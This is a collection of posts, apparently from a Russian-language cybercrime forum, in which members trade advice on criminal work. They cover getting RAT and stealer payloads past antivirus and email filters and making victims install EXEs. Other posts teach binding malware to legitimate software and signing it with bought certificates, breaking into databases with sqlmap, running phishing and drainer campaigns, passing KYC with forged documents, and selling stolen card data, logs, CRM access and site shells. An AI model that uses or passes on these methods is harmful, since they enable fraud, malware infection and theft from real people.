Hey guys, please, any tips on how to bypass the email attachment virus blocking, when I try to send my rat email, I tried a couple of ciphers, but it doesn't seem to work .. I'm not against a specialized service either
всем салют, ребзи подскажите как можно раскинуть сообщение на пускай 200 почт, со 100%-ным инбоксом кроме как руками? и с какой почты безопаснее, я лично пользуюсь протоном, но там вроде лимит против спама
Подскажите хороший, дешевый, анонимный метод спама по 3к email адресам (корп+личные). Plain Text
Лью его уже пол года , проблем совершенно нету , заметил соседнюю тему где
опрос
А у меня сразу действие
Сольют не сольют без разницы
В течении 24 часов сюда закину и раздеребаньте его , ухожу с трафа на сети
Уже 4 года занимаюсь различными направлениями трафика. В этой статье расскажу про ASO трафик с монетизацией на Gambling и Betting офферах.
Для начала предлагаю разобраться с базовыми понятиями, которые будут использоваться в статье, если вы уже знакомы с трафиком, то, скорее всего, можете пропустить этот абзац.
В этом кейсе мы рассматриваем вертикали Gambling и Betting. По этому же принципу тестировал крипто, финансовые офферы. Прибыль есть, но далеко не такая, как с азартными играми.
Теперь разберемся что же такое ASO и в каком виде мы его используем при
работе с гемблой и беттингом.
ASO – это комплекс мер оптимизации страницы мобильного приложения в магазине
приложений (PlayMarket, AppStore). ASO используется для увеличения поисковых
запросов, по которым индексируется ваше приложение, а также для поднятия
позиций в этих запросах. Цель ASO оптимизации - получить поисковый трафик.
Близкий аналог – SEO.
ASO трафик относится к направление УБТ добычи. Трафик мы не покупаем, а
добываем.
В случае нашего кейса, мы используем бренд ASO, т.е. мы делаем копию (или не
совсем копию) оформления крупного (или не очень крупного) бренда. Например,
делаем прилу похожую на 1xBet, собираем брендовый поисковый трафик и продаем
его реклам.
Партнерки и реклы так же разделяют этот вид трафика на Бренд ASO и Кроссбренд
ASO.
Далеко не все реклы готовы покупать свой же брендовый трафик, поэтому если вы
протоклнули прилу в мобильный стор бренда, который не покупает свой бренд ASO
трафик, то сливать его приходится кроссбрендом.
Чаще всего кроссбренд конвертит в разы хуже, чем бренд. Чаще всего, но не
всегда. Некоторые реклы так хорошо постарались над своей воронкой, что когда
на них льешь кроссбрендом, то конвертит в деп у них в разы лучше. Но такие
реклы обычно дают ставку ниже рынка.
Сборка прил. Сейчас существует множество конструкторов для сборки мобильных приложений, именно на подобном сервисе я собирал каждую свою прилу, название этого сервиса я не буду разглашать.
Про источники трафика. Источником для нас служит любой магазин (он же “стор” далее) мобильных приложений. Существует более 50 сторов, которые обычный пользователь телефона даже никогда не слышал. Я же работал с Play Market, Huawei App Gallery, тестировал еще пару небольших сторов, но трафика в них не оказалось в нужном количестве.
Пару слов о сторах, с которыми работал.
По прибыльности. Основной ориентир работы был на тир 3 страны, т.к. в этих ГЕО в разы больше трафика, чем в тир 1-2. Приведу пример 2х брендов, которые еще будут рассмотренны в этом кейсе.
Основная причина бана прил это использование чужого бренда без разрешения.
Бан можно снять, предоставив разрешение. Удалось сделать его благодаря
отзывчивой поддержке Huawei, которые очень подробно показывали, что в
разрешении сделанно с ошибкой
Но даже мой идеальный вариант разрешения (на сколько мне удалось его сделать)
со временем перестал проходить модерацию. Бывало, что одно и тоже разрешение
пропускал один модератор, но второй его отклонял. На вопросы модерация Play
Market отвечает шаблонными фразами и вразумительного ответа от них добиться
сложно. С грамотным юристом можно сделать идеальный вариант и переодически его
обновлять.
Чтобы обойти бан за бренд, ASOшники стараются его замаскировать. Используют
околобрендовое оформление скринов, логотипа и описания.
Примеры бренд ASO прил.
Если зайти сейчас и посмотреть выдачу по ключу mostbet, то видим несколько ASO
бренд брил:
Прямое вхождение ключа в название приложения увеличивает конверт в деп и
позицию в поиске, но в разы сложнее пропихнуть. К слову, раньше мостбет просто
идеально проходил модерацию даже с брендовой графикой, но в один “прекрасный”
день этот ключ задрочился и попал в стоп лист брендовых прил у модераторов.
Приложения, которые не используют прямого вхождения в название прилы,
добавляют ключ в краткое и полное описание:
Мостбет на данный момент имеет плохую проходимость даже со всеми стараниями
обходов, поэтому редко удается встретить приложение, похожее на оригинал.
Рассмотрим еще один пример на бренде Pin-Up. Этот бренд и сейчас имеет хорошую
проходимость в модерации и неплохое количество трафика, соответственно и
выхлопа.
Если приглядеться, то видно что на логотипе вместо буквы “I” используется
булавка. На скриншотах мы видим неприкрытый бренд, т.к. за скрины отклоняют по
причине бренда гораздо реже, но все же есть риски словить бан и из-за этого.
Гугл допускает оформление приложения в сторе без скринов самого приложения,
поэтому тут в оформление мы видим баннер нарезанный на 4 скрина.
Во втором случае, ASOшник закрыл девушкой надпись бренда, а в логотипе
использовал букву “P”, так как это является фирменной символикой PinUp бренда,
используя другой шрифт.
В Play Market не запрещены мобильные приложения на тематику казино и ставок на
спорт, в которых нет реальных ставок. Соответственно, при оформлении
мобильного приложения мы можем не стесняться использовать гембловые элементы,
делая агрессивные дизайны.
При необходимости могу поделиться в ЛС контактами графического иллюстратора,
которая оформляла мои приложения.
Какие ключи важны и как ранжировать прилу по этим ключам.
Важны ключи только названия бренда: mostbet, 1xbet, pinup и тд. По общим
ключам online casino нужно гораздо больше времени на поднятие позиций в
поиске, за свой небольшой срок службы прила не успевает по ним набрать
позиции. Для таких ключей нужны не брендовые прилы, что не в ходит в рамки
данного кейса.
У каждого стора свои правила ASO ранжирования ключей, у Play Market
ранжируется: название приложения, краткое описание, полное описание, название
аккаунта разработчика. Если использовать бренд в названии разработчика, то
могут не пропускать даже белую прилу по причине использования бренда в
названии аккаунта. Из-за подобного однажды пришлось выкинуть десяток
аккаунтов, т.к. проходимость модерации на них стала крайне мала.
В кратком описании и полном описании можно использовать бренд ключи с
минимальными рисками, по опыту заметил, что модераторы не читают описание.
Получал отклонение прилы по причине бренда в описании только на повторных,
более тщательных, модерациях, когда пытался оспорить отклонение.
После публикации мобильного приложения обычно проходит 2-3 дня, чтобы прила
проиндексировалась по нужным ключам. Для отслеживания позиций можно
использовать платный сервис asomobile.
Когда видим, что прила проиндексировалась по нужным ключам, желательно
заказать мотивированные установки по поисковым запросам. За определенную плату
школьники или боты вбивают в поиске ключ, листают до вашей прилы, качают,
открывают прилу после скачивания и через 2 дня. Благодаря мотивированным
установкам, наша прила улучшает свои позиции в поисковой выдаче и мы занимаем
хорошие позиции в поиске.
Летом прошлого года заметил, что прилы стали куда хуже подниматься по ключам
накруткой в Play Market. Чтобы сейчас получить желаемый результат, нужно куда
больше вложить денег в мотив инсталлы. Зато в Huawei APPGallery легко
накрутить позиции самостоятельно.
Накрутка необязательна, по наблюдениям 1 из 3 прил и так займет хорошие
позиции в поиске. Благодаря хорошему ASO и грамотному дизайну, который
увеличит конверсию в скачивании пользователя, который ищет в поиске бренд.
Итак, вот у вас есть прила в сторе, которая вот-вот займет свое место по ключам и нам нужно думать как будем монетизировать свой трафик.
Партнерская программа или прямой рекламодатель.
В последнее время, в связи со своей прибыльностью, развелось просто уйма
партнерских программ. Раньше для регистрации в ПП нужно было доказывать что ты
не залетный трафер, а что имеешь опыт и стату в другой ПП. Сейчас же
достаточно находиться в арбитражных чатиках и тебя уже будут ~~заебывать~~
приглашать лить в их ПП. После регистрации в ПП, менеджер уже на следующий
день будет ~~продолжать заебывать~~ спрашивать где же траф.
Если выбирать ПП, то обязательно выбираем где большое количество офферов, а не
2-5 рекла, как во многих ПП. Единственный плюс в ПП вижу в том, что можно в
пределах часа подключить новый оффер и по-быстрому его протестить. Если оффер
заходит, то стоит искать прямого рекламодателя.
К прямому рекламодателю попасть сложнее. Как правило, они будут спрашивать
твою статистику и опыт, капы у прямых реклов выше. Не забываем, что при работе
через ПП, % от вашего заработка забирает ПП, иногда процент солидный. Стоит
заметить, что почти у каждого рекламодателя есть свой аффилейт отдел, поэтому
как только набрали обороты с ПП, бегите скорей к прямому реклу и не кормите
посредников.
Прямой рекламодатель редко скамится, но вот ПП может зашейвить ваш трафик.
Напомню, что шейв это когда без причины срезают ваш трафик. В прошлом году
одна крупная (по некоторым рейтингам топовая) ПП зашейвила 4к$, на все вопросы
2 месяца кормила завтраками, в итоге своих 4к$ я не досчитался, с этой ПП
больше дел не имел.
Аккаунты разработчиков.
Несколько раз натыкался на мнение, что ГЕО аккаунта влияет на
проходимость/живучесть прил. Пытался проверить эту теорию, разницы не заметил.
Работают даже РУ аккаунты. Санкции коснулись только оплаты внутри мобильных
приложений через Google Pay.
Для регистрации аккаунта, необходимо привязать карту, оплатить взнос 25$,
после чего гугл пришлет письмо с просьбой пройти KYC.
Для KYC необходимо скинуть фото пасспорта/водительское
удостоверение/национальный ИД. Проходят отрисовки только очень хорошего
качества. Я перебрал много отрисовщиков, остановился на том, который печатает
доки на реальном пластике. С проходимостью таких документов проблем не
возникало. Криво сделанная отрисовка проходит, но будьте готовы в течение
первых пары недель получить запрос дополнительной проверки KYC.
Фармить на большом потоке качественные аккаунты разработчика – это большое
искусство, как только вы нафармите 100+ аккаунтов разработчика, у вас начнутся
проблемы с блокировками аккаунтов за мультиаккаунт. Возможно проблемы с фармом
решатся использованием логов гугла, но я так и не протестировал эту задумку.
На рынке аккаунты хорошего фарма стоят около 100$. Если вы нашли цену дешевле,
то скорее всего как только вы начнете брать у этого селлера объемами, в один
прекрасный момент вы столкнетесь с баном целого пака аккаунтов.
На одном аккаунте можно выложить 2 бренд прилы. В первый раз вам заблокируют
приложение по причине бренда, во втором случае помимо блока прилы, вы
получаете блокировку аккаунта по причине частых нарушений правил.
CPA или RevShare.
Мне подходила больше модель работы по CPA, т.к. мне была важная быстрая окупаемость трафика.
К чему я пришел. Прозанимался ASO трафиком почти год и перегорел. Все время работал в соло, пользуясь услугами фрилансеров. В лучший месяц выходило 25к$, в худший сидел и смотрел на пак в 100 забаненных аккаунтов разработчика. Постоянные качели, зависимость от месячных гугла. Много времени уходит на тесты и поиски новых брендов, ключи которых еще не задрочены. Плюс, не имея собственной сборки, добавляются проблемы сервисов сборки приложений. Для себя оставил это направление и пошел осваивать другие. Благо я делаю много тестов и в запасе всегда есть пару вариантов чем еще заняться.
I spam by sms but a few weeks ago T Mobile seems to have updated their
security which makes it impossible to spam using their SIM card
Please any sms spammer with new sending out method, let’s share ideas please
I’ll pay for reliable update
Spoiler
You must spend at least 7 day(s) on the forum to view the content.
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- folder.png&hash=63d46597e69ae4a51888711a37d2bf45&return_error=1)
](https://mega.nz/folder/eyAVkQSR#7jalKxRPjtl7VeoTykHQyg)
2 files
mega.nz
Кто знает нормальных ботов/селлеров с логами Бинг?
Интересуют свежие, любые предложения в лс, рассмотрю всё
темой траффика начал интересоваться около 2 недель назад, словарь подучил. Интерисует тематика пролива трафика, логов, сессий и прочего. Хочу обучится данной специальности. Будет полезная любая информация: ссылки на статьи/гайды, пояснения, терминология(что такое "кабы с биллингом ", "логи unsetteled/spend ", "припей логи "). Так же где берут логи, каким софтом чекают. Любая информация будет крайне полезна. Прошу помочь с информацией, а также, если есть, то контактами. Готов впитывать и познавать информацию, как губка. Спасибо!
Требуются Траферы по Гугл+СС на фишинги БА
При себе иметь клоаку
20-30% с обнала
Набираю трафферов добавляю в конфу в тг, уже 3 траффера есть
Офферы разные
Тг: chocobyeu
tox:
72ADC908C245B6596C115AD9131EEB0C2874CD91F044FA268B19F66A85E15A63DBBA827E15D1
Всем доброго дня - уважаемые коллеги, тестирую трой, дам «бесплатно»качественный траффик на «exe, apk, iso, вообщем хоть что». Траффик не биржа, не пуши, не дорвеи и не сео, гео не контролируем, в какой стране запустим там и пойдёт по сетям, но может разгуляться и уйти в Индонезию.
Что требуется под лаптоп и пк: exe фуд крипт с сертификатом.
Что требуется под Андройд: апк 0/31
Доступ к вашим панелям не требую, денег не прошу, но на отстук перед началом работы проверю запросив скриншот.
Работаю только с жителями форума зарегистрированных минимум с 2020.
По всем вопросам ПМ
Всем привет. Уже несколько месяцев решаю проблему с редиректами.
Раньше спасала BlackTDS. Как я делал:
1. Брал несколько впс + домены(старореги с регистраторов).
2. На эти впски вешал код редиректа с BlackTDS: Все подходящие клики -
пропускал на ссылку, по которой качался файл. Всех ботов(по мнению BlackTDS) +
НЕподходящие страны - не пропускал дальше.
3. В письмо вставлял ссылку на редирект. Ссылка менялась, условно, каждые
1000 писем.
И все было гуд. АВ и ресерчеров приходило поминимуму + рассылка шла отлично.
Но вот последние 2-3 месяца, все идет очень плохо. И АВ полезли в админку и с
рассылки приходят крохи.
Заметил, что сама BlackTDS стало пропускать много лишнего, например ISP
Amazon. Попросил сапа вручную на моем потоке забанить их. АВ стало меньше, но
рассылка лучше идти не стала.
Сап говорит, что сами боты стали умнее.
Хотел бы, чтобы кто нибудт поделился мнением или может быть методом. Возможно, кто то предложит другую ТДС(с фильтрацией ботов).
А то задалбался уже. На 99% уверен, что в моем случае - проблема имено в редиректах. Так как базы собираются ручками и проверяются многоступенчетой проверкой. Письма меняются и так же проверяются на инбокс. Файл к этому отношению не имеет, так как проблема именно в кол-ве кликов по линку.
Заранее большое спасибо.
Всех приветствую. Собственно, кого ищу в шапке. Ищу именно наставника/Тиму кто
обучит полностью работе с Google ads, начиная от выбора хостинга(технической
части) до самих проливов(логи/самореги). Не ищу покупку обучения! Как
говорится плавали - знаем. Отказы от гарантов, пустословы, кидалы. Но так же и
не прошу учить меня за бесплатно, готов по началу выполнять рутинную работу,
например фармить акки или что-то подобное, в общем изучать процесс поэтапно.
Опыт в проливе криптофишей/ Фиш ба есть, но проливал я их изучив сливы 21
года, поэтому как умел так и лил, соответственно учить меня с самого 0 не
нужно, я быстро схватываю. Вроде основные моменты описал, сильно не пинайте
Всем добра!
P.S. из мессенджеров Telegramm, Threema.
Подскажите шоп или сайт с картами которые можно для гугл адс заюзать
Ищу мануал как лить трафик с дискорда и прилогающие софты
Всем здравствуйте, так как времени не много, постораюсь вкраце написать про спам, тут ничего трудного. SMPT рассылку расматривать не буду, так как прогрев серверов занимает много времени.
Остановлюсь на Веб рассылки тут есть несколько вариантов, но так как я работал со всеми, буду советовать для простой и эффективной работы. Многие знают zennolab это комбаин для автоматизированной работы, к нему покупаете шаблон, акки, прокси и поехали, только он тяжелый и занимет много ресурсов, я выбрал достаточно простое решение, аренда готового вебмайлера от 1к$ месяц, под него нужен сервер для веб морды (8-16гигов цена от 200$) и сервер для самого софта от 12 ядер 64 гигов (от 450$ - это примерно до 100к мыл в сутки), когда все поставлено идем сюда buyaccs.com для рассылки по бигам gmail.com- от 700$ (первые сутки до 40-50к потом 100к с 1к акков) за 1к акков yahoo.com от 400$ за 1к, для корпов подойдет gmx и aol - от 200$ (первые сутки до 20к мыл, потом до 50к в сутки с 1к акков), конечно у практически каждого вебмайлера или той же зенки предусмотрена регестрация акков тут тоже никаких проблем достаточно подключить сервис с телефонными номерами и выбрать какие нужны под тот или иной сервис, обязательно берите софт с привязкой по прокси!!! Прокси достаточно много в продаже и тут советовать дело не благодарное, берите в разных местах СЕРВЕРНЫЕ на тесты от 300$ за неделю и той страны где будете спамить.
Теперь остановлюсь на самих емаил по которым спамить, есть несколько вариантов: 1. Покупка готовых баз у официалов 2. Поиск в логах (там маил:пасс можете взять шаблон по рассылке по контактам) 3. Достать самому, есть автоматизированный софт по взлому баз, а есть sqlmap самый ходовой и эффективны взломщик баз, подбераете домены нужной тематики и вперед, описание по работе с данным софтом предостаточно и не подтупливайте открывая одно окно с этим софтом в ожидании от 2-10 часов на один таргет, на линуксе сразу открывайте от 20 окон в зависимости от железа.
Теперь когда разобрались с софтом и таргетами, нужно что то слать тут уже зависит от вашего направление, я остановлюсь на рассылке вредоносов и объеденю пару тем в одной.
Само письмо должно быть рандомным или с привязкой к вашей базе мыло:имя:фамилия:должность и т.д. на форумах предостаточно предложений от 100$
Слать нужно только аттач или линком на ваш ленд
Смотрите хороший и чисты документ стоит от 3к$ его пропускают биги не проблема (всякие JS и т.д. отдачи не берите там отстук 1 на лям, тема умерла )) OV EV сертификаты обязательно для лодыря + соответственно крипт)
Если будите слать на ленд
1. Только домен старый б/у домен не в блеке
2. Хороший ленд гугл аналитик вам в помощь от 100$
3. ssl сертификат на домен обязательно!
4. Сам лодырь отдавать на прямую глупость, хотя есть скрипты на форумах
услуга примерно 100$ для отдачи через хром
5. Прекрасно подойдет склейка EXE + EXE (официального софта) - при запуске
сам софт будет работать и запускать ваш софт (склейки есть на форумах)
6. Обязательно!!! OV сертификат-500$ или еще лучше EV сертификат от
3500-6000$ как повезет
7. Перед спам рассылкой пустите трафик на ваш ленд и прокачайте вашу склейку
без запуска вредоноса, хотябы пару дней, лучше неделю, потом вперед.
Вроде тут все понятно и доступно каждое направление в зависимости от кошелька.
Привет, качнул с одного мерча, практически все ЮСА
такие поля в бд
Transaction ID Subscription ID Transaction Type Transaction Status Escrow
Status Created Datetime Created Timezone Settlement Date Disbursement Date
Merchant Account Currency ISO Code Amount Authorized Amount Submitted For
Settlement Service Fee Tax Amount Tax Exempt Purchase Order Number Order ID
Descriptor Name Descriptor Phone Descriptor URL Refunded Transaction ID
Payment Instrument Type Card Type Cardholder Name First Six of Credit Card
Last Four of Credit Card Credit Card Number Expiration Date Credit Card
Customer Location Customer ID Payment Method Token Credit Card Unique
Identifier Customer First Name Customer Last Name Customer Company Customer
Email Customer Phone Customer Fax Customer Website Billing Address ID Billing
First Name Billing Last Name Billing Company Billing Street Address Billing
Extended Address Billing City (Locality) Billing State/Province (Region)
Billing Postal Code Billing Country Shipping Address ID Shipping First Name
Shipping Last Name Shipping Company Shipping Street Address Shipping Extended
Address Shipping City (Locality) Shipping State/Province (Region) Shipping
Postal Code Shipping Country User IP Address Creating Using Token Transaction
Source Authorization Code Processor Response Code Processor Response Text
Gateway Rejection Reason Postal Code Response Code Street Address Response
Code AVS Response Text CVV Response Code CVV Response Text Settlement Amount
Settlement Currency ISO Code Settlement Currency Exchange Rate Settlement Base
Currency Exchange Rate Settlement Batch ID Fraud Detected Disputed Date
Authorized Transaction ID FixdEmail Upsellery Customer ID Upsellery
Transaction ID Country of Issuance Issuing Bank Durbin Regulated Commercial
Prepaid Payroll Healthcare Affluent Category Debit Product ID 3DS - SCA
Exemption Type 3DS - Merchant Requested SCA exemption PayPal Payer Email
PayPal Payment ID PayPal Authorization ID PayPal Debug ID PayPal Capture ID
PayPal Refund ID PayPal Custom Field PayPal Payer ID PayPal Payer First Name
PayPal Payer Last Name PayPal Seller Protection Status PayPal Transaction Fee
Amount PayPal Transaction Fee Currency ISO Code PayPal Refund From Transaction
Fee Amount PayPal Refund From Transaction Fee Currency ISO Code PayPal Payee
Email PayPal Payee ID Apple Pay Card Last Four Apple Pay Card Expiration Month
Apple Pay Card Expiration Year Apple Pay Cardholder Name Android Pay Source
Card Last Four Android Pay Source Card Type Source Card Last Four Risk ID Risk
Decision Device Data Captured Decision Reasons Acquirer Reference Number Venmo
Username
так же в аккаунте можно создать уведомление на почту по всем пользователям
На входе есть архив с логом какого-то компа. Лог имеет название
ZA831CA5A9FE5E1945749AE2BDBF384782_2024_04_10T01_34_57_753534.zip(взял первый
попавшийся, просто для примера). Внутри архива только результат работы
стилера(нет каких-либо линков на владельца панельки стилера).
Внутри лога есть информация, которая вызвала интерес к компу жертвы, с
которого он был получен.
Задача: выйти на владельца панельки, куда прилетели данные, для дальнейшего
сотрудничества по данному, конкретному компу жертвы стилера.
Какая стоимость баз email под спам, если допустим все уники собранные с форм
обратной связи форматом: [Имя][Фамилия][Почта]
Цена интересует по разным гео usa/eu/asia за 1к шутк
Хочу узнать выгодно ли продавать такие базы или нет.
Всем доброго! Подскажите куда копать , где найти кликфрод бот , или JS скрипты под Adwords или Директ ? Рассмотрю и платные варианты?
Салют завсегдатаям форума. Буду краток: есть доступ к CRM одного из американских маркетинговых b2b решений в области поведенческой и продуктовой аналитики (гуглим amplitude (dot) com).
А вместк с доступом идёт возможность выгрузки user bases клиентов данного сервиса. Другими словами — возможность получить email базы, принадлежащие разнообразным диджитал-бизнесам из США, ЮК, стран Евросоюза и Латинской Америки. Все это настоящие и живые люди, тратящие деньги на определенные товары и услуги
Направленность самая разная: беттинг, страхование, всяческая электронная коммерция от healthcare & beauty до luxury и много-много-много всего (как минимум 150+ млн адресов, количество которых продолжает увеличиваться само по себе). Собственно, email’ы это ещё не все. «По мелочи» есть ещё телефоны, биллинг/шиппинг адреса, полные имена..
В общем, тема приватная, как разговор с богом после пяти бутылок водки в три часа утра. Отсюда вытекает вопрос, а будет ли кому-нибудь здесь интересна такого рода информация?
P.S: если вы знаете, что с этим делать - любезно жду вас в ЛС с предложениями сотрудничества
Приветствую, уважаемые
В данном топике будем (буду) пытаться успешно запустить рекламную компанию в твиттер адс на крипто-оффер (ДрЕйНеР)
В новостной ленте твиттера в последнее время всё чаще и чаще вижу скам-рекламу на дрейнер подобного формата:
Думаю, сей метод продвижения дрейнеров является одним из самых результативных в данный промежуток времени, наряду с угоном дискорд-токенов админов и bing адс (замена #скончавшемуся гуглу )
В данном топике планирую делится непосредственно результатами запуска, тестами, наработками.
Что в данный момент МНЕ известно о твиттере:
Крипта на ручке (ручная модерация)
Потенциальный (непроверенный) метод обхода ручки:
Запустить первую компанию на белое, а уже потом крипту
Купить трастовый лог со спендом (но это изи, хули)
мой канал: **https://t.me/PreiLab **(освещаю свой путь до 3m$, потом удаляю канал)
Буду рад новым знакомствам, сейчас ищу единомышленников - вместе легче В теме драйнеров нахожусь реально долго, ещё до того как появилось само понятие "драйнер", по этому достаточно осведомлён в этой сфере, могу быть полезен в какой угодно вертикали добычи крипто трафика кста, прикол: фразу "лучший драйнер на рынке" придумал я, ещё полтора года назад, щас этой фразой именует свой продукт каждый второй бабкин-кодер ххпхапхапаз) но мы то знаем, кто действительно лучший (интрига)
В общем, прям щас купил несколько пустых твиттер аккаунтов с blue подпиской у селлера с зелёного форума , хочу попробовать прям к ним подвязать карту pst (вообще не реклама) и запустить компанию сначала на белое, буду держать в курсе и тут, в и канале. личка кстати тоже всегда открыта, воркаю 24/7 и всегда готов к новым контактам, САУ
Ребят, кто подскажет лучший способ добычи smtp/smtp relay в авто режиме?
Я ищу кого-то, кто хочет работать вместе. У меня работают фишинговые сайты, и я хочу показывать объявления, чтобы люди могли войти на мой сайт в своем банке. Идея не была сделана никем, и мне очень легко снять деньги. Если вы хотите работать вместе и говорить о хорошей сумме, вы можете написать мне на Telegram: @BunqLoad
**Здравствуйте друзья!
На кругленькое число участников нашего чата выпускаю обещанный мануал.
guglu-2024-02-17)
Всем привет, с вами также Картель. В чате достигло уже 300 человек, на что я пообещал выкатить мануал.
telegra.ph
**
В данный момент лью с попеременным успехом с юсы, много отлетает, много нюансов (кто работает по юсе, поймёт меня). услышал недавно, что с логов укр попроще работать? кто может поделиться какой картон туда вязать?
Anyone know software for sms or email spamming , thanks in advance !
В арбитраже полный 0, но есть желание научиться, так как есть много проектов. Ищу обучение с нуля и траферов для работы
курс с Udemy
Курс был удален площадкой UDEMY %).
Материал неплохой
Учимся массово спамить в инбокс)
Hidden content for authorized users.
Unlimited Emails! ](https://yadi.sk/d/gzxKmJsq3Pxxhw)
Посмотреть и скачать с Яндекс.Диска
yadi.sk
there's a great results in phishing pages/scampage, always victim give info's.
I'm thinking , what is best techniques to get victims to install exe.
is it good idea to use the redirects solutions? I'm thinking maybe there is
some fast payload for victim to install the exe without knowing
I will appreciate your thoughts
Всем привет. Я ранее никогда не сталкивался с рассылкой писем, тем более с малварью. Я знаю кому буду слать и какой пэйлоад, но множество незакрытых вопросов.
Закидывайте меня любыми материалами, репортами, семплами, статьями, конфами, софтом.
Подскажите есть рабочие автопостеры на olx.ua ?
Всем привет! Если здесь есть люди, которые имеют опыт залива УБТ клипов через ютуб шортс, то подскажите пожалуйста каким образом вы делаете нарезки клипов из полноценного видео? Через какие сервисы, либо в ручную или через самописных тг ботов. Я пробывал несколько сервисов, которые сами нарезают клипы из видео, но на бесплатной версии там либо водяные знаки, либо еще какое-нибудь мешающее дерьмо, а платная версия это целый геморрой из-за надобности заграничных карт. Поделитесь пожалуйста, как это делаете вы.
Всем привет ,подскажите почты с которых сейчас можно норм спамить ,что-нибудь на подобии atlas.cz ,volny.cz ,seznam.cz ,что-то похожее ,но чтоб в спам не летело как на этих почтах. Спасибо.
Доброго времени суток подскажите какие есть способы добычи баз email корпов
под брут?
могу оплатить нормальные способы если есть рабочая схема .
Hola, Need sms api/gateway to send bulk sms in Uk or ready platform which offer that. Did anyone tried smsroute.to? Any tips welcome, as I am new into spamming.
Доброго времени суток! Начал заниматься спам-рассылкой. Использую свой смтп (postfix), письма с фиш ссылкой летят в спам. Уже понял, что надо греть домен, а нужно ли греть домен для фиш ссылки? У меня свой сокращатель ссылок, со сторонними сокращалками тоже спам. Куда еще смотреть? спф, дким, дмарс и рднс настроены, на майл тестере 10 из 10. Порекомендуйте источники для получения информации и можете просто дать совет. Заранее всем спасибо за наводки
Приветствую, ситуация следующая есть у меня иностранный покупатель, который на постоянной основе покупает шеллы разных сайтов, по хорошей цене. Список последних купленных им сайтов:
Spoiler: Сайты
batterybigbazaar.com
hotelmojosari.com
blai-sys.com
grandgrafika.com
iptv-station.com
griyahotelmedan.com
Собственно вопрос в том, как по вашему человек монетизирует данные купленные у меня сайты? У меня нету догадок так как в монетизации сайтов не понимаю вообще ничего. А покупаемые им сайты не отличаются какими то высокими показателями DA, PA, посещаемости или индексации сайта.
Доброго времени суток! Хочу научиться работать с логами, конечная цель - доставать из логов доступ к корпоративным сетям. Подскажите, с чего можно начать, какой софт нужен, статьи/мануалы, в какую сторону смотреть - буду непомерно признателен за любую полезную информацию.
Поделитесь, пожалуйста. Интересует программы для работы в тг. парсинг,
инвайтинг, рассылки и т.д.
Какие есть, где купить и сколько стоит?
есть ли опыт и отзывы на что-то?
I got more then 500 clicks in 8 hours. is it normal to have 0 installs on me dashboard?
Первый день на форуме, вижу отзывчивость находящихся здесь юзеров, решил попытать удачу. Заранее прощу прощения за возможные недочеты в сути вопросы и правильности его постановления (в случае чего удалите тему, но пожалуйста объясните причину, чтобы не допускал этого повторно) .
Не видел темы с прямым вопросом " Как лить тик ток ", есть темы с
единичными советами
В связи с своим небольшим бюджетом, как по мне, тик ток хорошо подойдет для
УБТ
Можете писать в лс и под темой.
Если есть знающие в этой сфере, способные помочь мне и другим юзерам, желающим
себя попробовать в этой сфере, буду искренне
благодарен.
hello I am looking for work partner I am available for sending massive email inbox
Всех приветствую, пришёл на форум за советом, честно говоря зарегистрировался только сегодня. Лью я трафик на серые офферы, не знаю по душе ли вам такое. Я покупаю дропы и ставлю туда клоаку, настроена она через Кейтаро. Занимаюсь этим уже около полугода, но так и не смог вывести закономерность выхода сайтов в топ. Какие-то стреляют и без проблем выносят выдачу, какие-то вообще висят мёртвым грузом. Я не совсем чайник, естественно про DA, PA, Moz rank и бэклинки немножко рассекаю. Обычно брал большие объемы дропов и лил, некоторые стреляли, сейчас пытаюсь подбирать по критериям и начинаются проблемы, хотя показатели совсем неплохие. Также вопрос по поводу наполнения дропа, контента в нём. Всегда делаю уникальный текст, бот видит обручную html страницу.
Надеюсь подчерпну полезную информацию отсюда, да может и с вами чем-то вкусным поделюсь)
$BULLETPROOF HOST LINK$
Fast flux is a domain name system (DNS) based evasion technique used by cyber
criminals to hide phishing and malware delivery websites behind an ever-
changing network of compromised hosts acting as reverse proxies to the backend
botnet master—a bulletproof autonomous system.[1] It can also refer to the
combination of peer-to-peer networking, distributed command and control, web-
based load balancing and proxy redirection used to make malware networks more
resistant to discovery and counter-measures.
Below is list spamming Companies most spammer 's target
-Office-365 script page $-link
-Telstra Webmmail $-link
-Business target webmail script page $-link
-Netflix script page $-link
-Bank script page$- link
-Godaddy script page $-link
-Rackspace script page $-link
-Cryppto script pages $-link
-Alibaba script page $-link
happy security pen testing xss.is
Fams!!!
this is my first post shortly i will be posting some private methods of
spamming tutorial for beginners spammer's and smtps/mailaccess cracker's
IAM Farmer member of sky-fraud
Всем доброго времени суток!
Кто сталкивался с проблемой подскажите пожалуйста, делаю РК запускаю компанию,
на белую товарку, белый ленд. Через пару часов прилетает вредоносное ПО. В чем
может быть проблема? Спасибо.
Content was hidden.
Привет!
Ищем только специалиста.
Сделка только через Гарант.
Общение только в лс форума.
**Сейчас с этим все супер печально( Ютуб душит трафферов и не дает вывести
ролик в топ, есть может способы/лайфхаки как можно закинуть ролик в топ?
Заранее спасибо)**
Я использую raccon stealer для шифрования exe, добавляю сертификат OV,
Сделал белые и черные страницы,
Затем купите трафик биржи самостоятельно, используйте magicchecker для
фильтрации робота, установите ссылку для скачивания exe на статистику
iplogger,
Я тестировал трафик 12 $ и показал около 10 000 раз. Ссылка на скачивание отображалась 18 раз на iplogger, но получился только 1 лог. В чем проблема?
Другой вопрос, где хранятся ваши exe файлы? Есть ли хорошая рекомендация по хостингу файлов? Можно ли разместить его на собственном VPS (многие VPS не могут хранить вредоносное ПО)? В настоящее время я временно выложил его на namecheap, но вскоре он может быть забанен.
Добрый день, представляю брокера.
Ищу спамеров для сотрудничества. Платим хорошо, платим за депозит клиента.
Арабы -900$ NZ - 850$ AU - 1100$
Подробности в лс - https://t.me/dmitriydata
Есть криптобаза в руках, на 10 млн строк.
Формат:
Email:pass
Как я понимаю, мне нужно прочекать на Валид, после каким то софтом на монету.
Так вот, какой софт под монету?
Задумывался ли кто-нибудь, почему в Интернете легче купить автомат Калашникова, чем отправить СПАМ?
Мне нужна милосердная душа на форуме, чтобы объяснить мне это, пожалуйста.
Заранее спасибо
Hi people of XSS, i need a lil help regarding mail spamming, i need to spam
mails but i dont know any good smtp i used to spam with cpanels webmails,
yahoo smtps, and gmail but yahoo and gmail not working now a days soo i really
need some good SMTPs,
so if you guys know good smtps or ways of mass mailing then pls suggest me
some ),
THX in advance )))
Всем привет.
Если тема уже была то сразу извиняюсь не кидайте помидоры.
Интересно и актуально узнать теги по отработке логов. Кто какие запросы
вбивает.
